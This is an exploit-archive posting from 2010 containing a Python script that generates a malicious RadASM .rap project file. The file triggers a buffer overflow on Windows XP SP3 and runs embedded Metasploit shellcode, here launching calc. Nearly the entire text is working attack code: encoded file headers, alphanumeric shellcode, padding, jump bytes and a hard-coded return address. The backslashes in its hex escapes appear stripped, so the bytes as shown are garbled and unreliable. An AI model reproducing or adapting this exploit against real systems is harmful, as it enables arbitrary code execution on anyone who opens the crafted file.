radasmrap-overflow.txt
Posted on 12 February 2010
Note: i used different way to exploit it (its not a duplicated exploit) # Exploit Title: Radasm (.rap) Universal buffer overflow Exploit # Date: 10/02/2010 # Author: Dz_attacker # Tested on: Windows xp sp3 # Code : #!/usr/bin/python #[+] Radasm (.rap) Universal buffer overflow Exploit #[+] Original : http://www.exploit-db.com/exploits/11392 #[+] Exploit : Dz_attacker (dz_attacker@hotmail.fr) header1=( "x5bx50x72x6fx6ax65x63x74x5dx0dx0ax41x73x73x65x6dx62x6cx65x72" "x3dx6dx61x73x6dx0dx0ax47x72x6fx75x70x3dx31x0dx0ax47x72x6fx75" "x70x45x78x70x61x6ex64x3dx31x0dx0ax5bx46x69x6cx65x73x5dx0dx0a" "x31x3dx41x56x50x20") header2=( "x2ex41x73x6dx0dx0ax32x3dx41x56x50x20x4fx76x65x72x2ex49x6ex63" "x0dx0ax5bx4dx61x6bx65x46x69x6cx65x73x5dx0dx0ax30x3dx41x56x50" "x20x4fx76x65x72x2ex72x65x73x0dx0ax5bx4dx61x6bx65x44x65x66x5d" "x0dx0ax4dx65x6ex75x3dx30x2cx31x2cx31x2cx31x2cx31x2cx31x2cx31" "x2cx30x2cx30x2cx30x2cx30x2cx30x2cx30x2cx30x2cx30x2cx30x0dx0a" "x31x3dx34x2cx4fx2cx24x42x5cx52x43x2ex45x58x45x20x2fx76x2cx31" "x0dx0ax32x3dx33x2cx4fx2cx24x42x5cx4dx4cx2ex45x58x45x20x2fx63" "x20x2fx63x6fx66x66x20x2fx43x70x20x2fx6ex6fx36x43x6fx67x6fx20" "x2fx49x22x24x49x22x2cx32x0dx0ax33x3dx35x2cx4fx2cx24x42x5cx4c" "x49x4ex4bx2ex45x58x45x20x2fx53x55x42x53x59x53x54x45x4dx3ax57" "x49x4ex44x4fx57x53x20x2fx52x45x4cx45x41x53x45x20x2fx56x45x52" "x53x49x4fx4ex3ax34x2ex30x20x2fx4cx49x42x50x41x54x48x3ax22x24" "x4cx22x20x2fx4fx55x54x3ax22x24x35x22x2cx33x0dx0ax34x3dx30x2c" "x30x2cx2cx35x0dx0ax35x3dx72x73x72x63x2ex6fx62x6ax2cx4fx2cx24" "x42x5cx43x56x54x52x45x53x2ex45x58x45x2cx72x73x72x63x2ex72x65" "x73x0dx0ax36x3dx2ax2ex6fx62x6ax2cx4fx2cx24x42x5cx4dx4cx2ex45" "x58x45x20x2fx63x20x2fx63x6fx66x66x20x2fx43x70x20x2fx6ex6fx6c" "x6fx67x6fx20x2fx49x22x24x49x22x2cx2ax2ex61x73x6dx0dx0ax37x3d" "x30x2cx30x2cx22x24x45x5cx4fx6cx6cx79x44x62x67x22x2cx35x0dx0a" "x5bx47x72x6fx75x70x5dx0dx0ax47x72x6fx75x70x3dx41x64x64x65x64" "x20x66x69x6cx65x73x2cx41x73x73x65x6dx62x6cx79x2cx52x65x73x6f" "x75x72x63x65x73x2cx4dx69x73x63x2cx4dx6fx64x75x6cx65x73x0dx0a" "x31x3dx31") # win32_exec - EXITFUNC=process CMD=calc Size=343 Encoder=PexAlphaNum http://metasploit.com shellcode=( "xebx03x59xebx05xe8xf8xffxffxffx4fx49x49x49x49x49" "x49x51x5ax56x54x58x36x33x30x56x58x34x41x30x42x36" "x48x48x30x42x33x30x42x43x56x58x32x42x44x42x48x34" "x41x32x41x44x30x41x44x54x42x44x51x42x30x41x44x41" "x56x58x34x5ax38x42x44x4ax4fx4dx4ex4fx4ax4ex46x44" "x42x30x42x50x42x50x4bx58x45x54x4ex43x4bx48x4ex37" "x45x50x4ax57x41x30x4fx4ex4bx58x4fx34x4ax41x4bx58" "x4fx55x42x52x41x50x4bx4ex49x54x4bx58x46x33x4bx38" "x41x30x50x4ex41x33x42x4cx49x59x4ex4ax46x58x42x4c" "x46x57x47x50x41x4cx4cx4cx4dx50x41x30x44x4cx4bx4e" "x46x4fx4bx53x46x55x46x52x46x50x45x57x45x4ex4bx38" "x4fx55x46x52x41x50x4bx4ex48x56x4bx48x4ex50x4bx44" "x4bx58x4fx45x4ex51x41x50x4bx4ex4bx58x4ex51x4bx38" "x41x30x4bx4ex49x58x4ex35x46x42x46x50x43x4cx41x43" "x42x4cx46x36x4bx48x42x44x42x33x45x58x42x4cx4ax57" "x4ex30x4bx38x42x54x4ex30x4bx38x42x57x4ex41x4dx4a" "x4bx48x4ax46x4ax30x4bx4ex49x30x4bx38x42x38x42x4b" "x42x30x42x30x42x50x4bx38x4ax36x4ex43x4fx55x41x53" "x48x4fx42x36x48x45x49x48x4ax4fx43x48x42x4cx4bx37" "x42x55x4ax56x50x57x4ax4dx44x4ex43x57x4ax46x4ax59" "x50x4fx4cx48x50x30x47x55x4fx4fx47x4ex43x56x41x56" "x4ex36x43x56x42x30x5a") buffer = header1 buffer += "x41"*2 buffer += shellcode buffer += "x41"*(1809-len(shellcode)) buffer += "x61"*3 buffer += "xFFxD0" buffer += "xEBxF9x90x90" buffer += "x55x25x40x00" #univ ret buffer += header2 try: rap = open("exploit.rap",'w') rap.write(buffer) rap.close() print "Exploit file created! " except: print "Error occured!" ________________________________ Vous cherchez l'intégrale des clips de Michael Jackson ? Bing ! Trouvez !<http://www.bing.com/videos/search?q=Michael+Jackson&FORM=MVDE6>